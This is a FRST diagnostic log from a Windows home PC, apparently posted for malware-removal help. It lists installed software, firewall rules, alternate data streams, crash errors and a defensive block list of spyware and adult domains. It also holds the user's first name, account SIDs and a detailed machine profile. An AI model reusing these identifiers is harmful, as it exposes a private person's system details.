Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50709.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MKVToolNix 9.2.0 (64bit) [20160504-01204] (HKLM-x32\...\MKVToolNix) (Version: 9.2.0 - Moritz Bunkus)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Templates - Starter Kit (x32 Version: 9.0.4.0 - Nero AG) Hidden
Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 130.0.374.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
Pinball FX2 (HKLM\...\Steam App 226980) (Version:  - Zen Studios)
Plants vs. Zombies: Game of the Year (HKLM-x32\...\Steam App 3590) (Version:  - PopCap Games, Inc.)
PS_AIO_06_C309g-m_SW_Min (x32 Version: 130.0.396.000 - Hewlett-Packard) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RAD Video Tools (HKLM-x32\...\RADVideo) (Version:  - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.92.115.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7443 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.12.0906 - REALTEK Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Remote Desktop Web Connection (HKLM-x32\...\TsActiveXClient) (Version:  - )
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
SEGA Mega Drive & Genesis Classics (HKLM\...\Steam App 34270) (Version:  - Sega)
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sound Forge Pro 10.0 (HKLM-x32\...\{3F9170C9-A7C2-408F-A4D8-EC77250040BF}) (Version: 10.0.368 - Sony)
SoundTrax (x32 Version: 4.0.18.0 - Nero AG) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.11 - Piriform)
Splashtop Personal (HKLM-x32\...\{E7CF0F14-8C1D-41F3-85ED-579C108262C7}) (Version: 2.6.2.2 - Splashtop Inc.)
Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.)
Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 2.6.5.2 - Splashtop Inc.)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Surgeon Simulator 2013 (HKLM-x32\...\Steam App 233720) (Version:  - Bossa Studios)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Tinker (x32 Version: 1.0.0001.131 - Microsoft Corporation) Hidden
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version: 7.50 - C. Ghisler & Co.)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\UnityWebPlayer) (Version: 4.5.4f2 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Vanguard Princess (HKLM-x32\...\Steam App 262150) (Version:  - Tomoaki Sugeno)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
Winamp (HKLM-x32\...\Winamp) (Version: 5.572  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 3.1.1.0 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
Zen Bound® 2 (HKLM-x32\...\Steam App 61600) (Version:  - Secret Exit Ltd.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {62DBB2ED-53F7-4E86-A428-95BC28643547} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {8D465B44-5A73-4D53-8ED1-A5AB63B0D6F2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {CBDDF58D-D4B7-49F1-95FC-8B25497AC7E2} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2009-10-16 11:50 - 2007-07-12 22:37 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-09-01 18:12 - 2016-09-01 18:12 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-09-01 18:12 - 2016-09-01 18:12 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2009-10-15 19:01 - 2009-08-16 17:06 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2013-12-26 18:40 - 2009-02-27 17:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-09-01 18:13 - 2016-09-01 18:13 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-09-01 18:13 - 2016-09-01 18:13 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-05-30 13:11 - 2012-05-30 13:11 - 00176128 _____ () C:\Program Files (x86)\AIM\nssckbi.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\remotepc => "(Default)"="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 6850 more sites.

IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\123simsen.com -> www.123simsen.com

There are 6847 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-03-28 10:26 - 2016-10-16 17:31 - 00000261 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Kevin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: Adobe Version Cue CS4 => 3
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: EPSON_EB_RPCV4_01 => 2
MSCONFIG\Services: EPSON_PM_RPCV4_01 => 2
MSCONFIG\Services: MSCSPTISRV => 3
MSCONFIG\Services: Nero BackItUp Scheduler 4.0 => 2
MSCONFIG\Services: PACSPTISVR => 3
MSCONFIG\Services: SPTISRV => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: GarminExpressTrayApp => "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{D72C2225-53D2-4132-8B62-6D47D74370B2}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{4F2888B2-795C-43A2-9DE7-3D67C23E9EFD}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [{4AEFD5B7-6490-43B6-A9A3-8D434226D4C1}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{31CEC40E-40A5-4384-A30E-D64A192315F8}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{4A10FDEF-32EE-49BA-9079-60611F65FCA4}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{DD66BCA3-D5EA-4019-A699-647CDBB35E4E}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [TCP Query User{5D882E10-30C6-4DCD-92DF-DED988BC4580}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [UDP Query User{3A1C4ED2-84AF-4DCE-A1CA-C95923C309A8}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [{2E782367-E17B-407D-A156-13750F7439C3}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2E03B05A-5408-477A-A703-965AA4F38D25}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{828E6D48-4BF2-4AD2-81A9-2A1462B4E674}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6F7B0A40-E20B-4B78-94FA-993027B60B4A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F657D074-33D8-4C55-944F-FFD1BDAA554D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{89EFCCC9-BA0D-4714-9CD2-73D760666CBE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{D9441015-6814-4FDC-82C5-05E4A8BDA33E}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{473B5F6C-8006-422B-9302-EBD49BEEE7F8}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92BE4FFE-BD03-434A-B50B-BBC7A05AF9A6}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{BBE2A838-72DD-4384-A37F-A9E30A9CDE5F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{EDC127AA-ACFE-4327-A7FB-0D5B26C9E705}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zen Bound 2\ZenBound2.exe
FirewallRules: [{407E9A69-6A9D-4573-9D06-7701D04623EF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zen Bound 2\ZenBound2.exe
FirewallRules: [{81C652E8-93F8-4FF5-AFE7-816B706DF46E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Plants Vs Zombies\PlantsVsZombies.exe
FirewallRules: [{351ACEB7-3E70-457F-8B3A-B117D9773CF8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Plants Vs Zombies\PlantsVsZombies.exe
FirewallRules: [{2540ED78-3A39-463B-8CFD-96E82EAE2207}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crazy Taxi\AppLauncher.exe
FirewallRules: [{D086F2AA-2D9F-40AA-B076-14243095359D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crazy Taxi\AppLauncher.exe
FirewallRules: [{B76F0BEE-4A71-4EDA-AC6A-D0E48613429F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{1A41D4FD-2C0A-4F89-A5F0-AA4072220F29}] => (Allow) LPort=2869
FirewallRules: [{11C64AB4-5865-4ADC-BA3B-25B773A59512}] => (Allow) LPort=1900
FirewallRules: [{E6A554D2-2B55-484B-B4FF-D78C819BAF8D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{1185EED7-EB7E-4D9A-9006-3DB1A8F189AD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\vanguard-princess\vanpri.exe
FirewallRules: [{91CBB966-379A-4552-A10F-250BAEDC4597}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\vanguard-princess\vanpri.exe
FirewallRules: [{9E472EFA-71DA-4C1C-B092-3C2F4EFE9EBF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0414006B-564E-4090-9F33-E1B194A8AB1B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{18539329-1513-459B-B3AC-96015890535D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{D868CC3B-43F9-453C-8FAA-9FC933E18A4A}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{9CF32D3C-B5C5-48E9-8C66-96A892AC7584}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D4CD6B89-B2A9-4061-AFF0-5E54D490FA1A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E2F64D7C-ABA8-4092-B61D-AE8CA23AC0FE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Pinball FX2\Pinball FX2.exe
FirewallRules: [{1C52BC0B-33F4-46D4-B687-8E4843E1919B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Pinball FX2\Pinball FX2.exe
FirewallRules: [{B0C34B83-6A58-445F-8E08-28836AAE7F5F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7B6912D4-1323-4A48-8B10-D6A3DAB365D8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{00584755-DC1B-4C14-91B9-965A2609796F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{36053EB5-8C34-4C1A-9A98-9EFD493EE033}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A770430F-CFCF-48DD-A7AF-EF983980494A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGameRoom.exe
FirewallRules: [{3463236B-F754-4051-A584-3546523C1C64}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGameRoom.exe
FirewallRules: [{80BF2E2B-86DE-4BAE-9526-1A1A6C6EFAC3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{A8476046-D0F4-4931-8E3E-79223FDFDD98}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{8F664E72-1E5A-43E1-905B-22BF6C8E184C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Castle of Illusion\COI.exe
FirewallRules: [{6C91283A-61AB-466C-9AA1-A8D4FABEBC1B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Castle of Illusion\COI.exe
FirewallRules: [{53B98CBD-2D6A-4BDB-83C6-6094927B5795}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{1A52D112-FE4B-42A0-B575-BC9DFB644FA2}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3197322C-6630-42B1-9279-C7AB0A247498}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{1D97F4C4-D04D-4E24-A495-C39F5F510CB5}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe
FirewallRules: [{A8CB881E-56F2-478A-8526-F5649CB527CF}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\DataProxy.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/16/2016 05:50:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x1128
Faulting application start time: 0x01d227f74136e66d
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 7f0efe6a-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:50:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x780
Faulting application start time: 0x01d227f73e8db574
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 7c67c948-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x600
Faulting application start time: 0x01d227f73a773381
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 78fd8f6b-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:30:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x54c
Faulting application start time: 0x01d227f48663c37c
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
